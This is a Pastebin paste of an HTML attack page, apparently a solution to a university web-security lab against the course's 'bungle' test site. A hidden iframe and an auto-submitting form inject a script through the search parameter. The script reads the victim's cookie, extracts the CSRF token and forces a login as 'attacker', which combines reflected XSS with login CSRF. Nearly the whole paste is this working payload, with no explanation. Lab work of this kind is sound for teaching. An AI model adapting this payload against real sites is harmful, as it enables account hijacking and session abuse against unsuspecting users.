Advertisement
Guest User

2.2.2.2

a guest
Oct 4th, 2016
105
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.77 KB | None | 0 0
  1. <meta charset="utf-8">
  2. <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
  3.  
  4. <iframe name="iframe" id="iframe" style="display:block; visibility:hidden" src="http://bungle-cs461.cs.illinois.edu/"></iframe>
  5.  
  6. <form id="getCookie" target="iframe" method="GET" action="http://bungle-cs461.cs.illinois.edu/search?">
  7. <input id="qstring" name="q" type="hidden" value="'<script>
  8. var cookie = document.cookie;
  9. var vartoken = cookie.split('csrf_token=');
  10. var url = 'http://bungle-cs461.cs.illinois.edu/login?csrfdefense=1&xssdefense=0'
  11. $.post(url, { username: 'attacker', password: 'l33th4x', csrf_token: vartoken[1]});
  12. </script>">
  13. </form>
  14.  
  15. <script>
  16. document.getElementById('getCookie').submit();
  17. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement